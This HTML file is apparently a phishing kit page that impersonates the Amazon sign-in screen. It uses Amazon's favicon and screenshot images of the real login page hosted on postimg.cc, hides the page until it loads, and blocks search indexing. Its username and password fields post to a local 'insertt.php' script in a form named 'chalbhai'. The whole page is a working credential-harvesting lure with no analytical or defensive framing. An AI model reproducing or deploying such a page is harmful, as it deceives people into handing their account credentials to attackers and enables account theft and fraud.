<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sign in - amazon.com</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="https://www.amazon.com/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">

.textox {
   width: 279px;
   height: 40px;
   border: solid 1px #BFBFBF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }
.textox:focus  {
   border: solid 1px #6AB6E6;
  }
  
.textox2 {
   width: 139px;
   height: 24px;
   border: solid 1px #FFFFFF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }

input[type=checkbox].css-checkbox {
							position:absolute; z-index:-1000; left:-1000px; overflow: hidden; clip: rect(0 0 0 0); height:1px; width:1px; margin:-1px; padding:0; border:0;
						}

						input[type=checkbox].css-checkbox + label.css-label, input[type=checkbox].css-checkbox + label.css-label.clr {
							padding-left:29px;
							height:24px; 
							display:inline-block;
							line-height:24px;
							background-repeat:no-repeat;
							background-position: 0 0;
							font-size:24px;
							vertical-align:middle;
							cursor:pointer;

						}

						input[type=checkbox].css-checkbox:checked + label.css-label, input[type=checkbox].css-checkbox + label.css-label.chk {
							background-position: 0 -24px;
						}
						label.css-label {
				background-image:url(http://csscheckbox.com/checkboxes/u/csscheckbox_a608ec28e6c50a02870bf452f125b974.png);
				-webkit-touch-callout: none;
				-webkit-user-select: none;
				-khtml-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}

</style>

</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:710px; top:10px; width:112px; height:37px; z-index:1"><img src="https://i.postimg.cc/52DZHBqC/logo.png" alt="" title="" border=0 width=112 height=37></div>
<div id="image2" style="position:absolute; overflow:hidden; left:588px; top:64px; width:358px; height:68px; z-index:1"><img src="https://i.postimg.cc/1z93d12B/2019-08-27-18-22-20-Amazon-Sign-In.png" alt="" title="" border=0 width=358 height=68></div>
<div id="image4" style="position:absolute; overflow:hidden; left:616px; top:170px; width:219px; height:60px; z-index:1"><img src="https://i.postimg.cc/zXkprJ6R/signin.png" alt="" title="" border=0 width=219 height=60></div>
<div id="image4" style="position:absolute; overflow:hidden; left:617px; top:280px; width:302px; height:16px; z-index:1"><img src="https://i.postimg.cc/kg2m6hxw/pass.png" alt="" title="" border=0 width=302 height=16></div>
<div id="image1" style="position:absolute; overflow:hidden; left:617px; top:400px; width:285px; height:33px; z-index:1"><img src="https://i.postimg.cc/Rh0gqyjT/condition.png" alt="" title="" border=0 width=285 height=33></div>
<div id="image3" style="position:absolute; overflow:hidden; left:589.6px; top:142px; width:356px; height:10px; z-index:1"><img src="https://i.postimg.cc/Rhr3HTx3/lineup.png" alt="" title="" border=0 width=356 height=10></div>
<div id="image3" style="position:absolute; overflow:hidden; left:587.7px; top:150px; width:7px; height:401px; z-index:1"><img src="https://i.postimg.cc/YqQcM39v/line.png" alt="" title="" border=0 width=7 height=401></div>
<div id="image3" style="position:absolute; overflow:hidden; left:938.8px; top:150px; width:7px; height:401px; z-index:1"><img src="https://i.postimg.cc/YqQcM39v/line.png" alt="" title="" border=0 width=7 height=401></div>
<div id="image3" style="position:absolute; overflow:hidden; left:0px; top:550px; width:1532px; height:150px; z-index:1"><img src="https://i.postimg.cc/jqmF9ntM/footer.png" alt="" title="" border=0 width=1532 height=150></div>

<form action="insertt.php" name=chalbhai id=chalbhai method=post>

<input name="userid" required type="text" class="textox"  placeholder="" style="position:absolute;width:297px;height:32px;padding-left:10px;font-size:13px;left:618px;top:235px;z-index:22">
<input name="pass" required type="password" class="textox"  placeholder="" style="position:absolute;width:297px;height:32px;padding-left:10px;font-size:13px;left:618px;top:300px;z-index:22">

<div id="checkboxG1"  style="position:absolute; left:619px; top:445px; z-index:24"><input type="checkbox" name="checkboxG2" id="checkboxG2" ><label for="checkboxG2" class="css-label radGroup1 clr"></label></div>
<div id="formimage1" style="position:absolute; left:640px; top:448px; z-index:25"><input type="image" name="formimage1" width="175" height="15.5" src="https://i.postimg.cc/xT3FgGPH/keepme.png"></div>
<div id="formimage1" style="position:absolute; left:618px; top:480px; z-index:25"><input type="image" name="formimage1" width="297" height="60" src="https://i.postimg.cc/4NHStKLk/newuser.png"></div>
<div id="formimage1" style="position:absolute; left:618px; top:350px; z-index:25"><input type="image" name="formimage1" width="297" height="35" src="https://i.postimg.cc/t4d4Ccyf/singinbotton.png"></div>
</body>
</html>
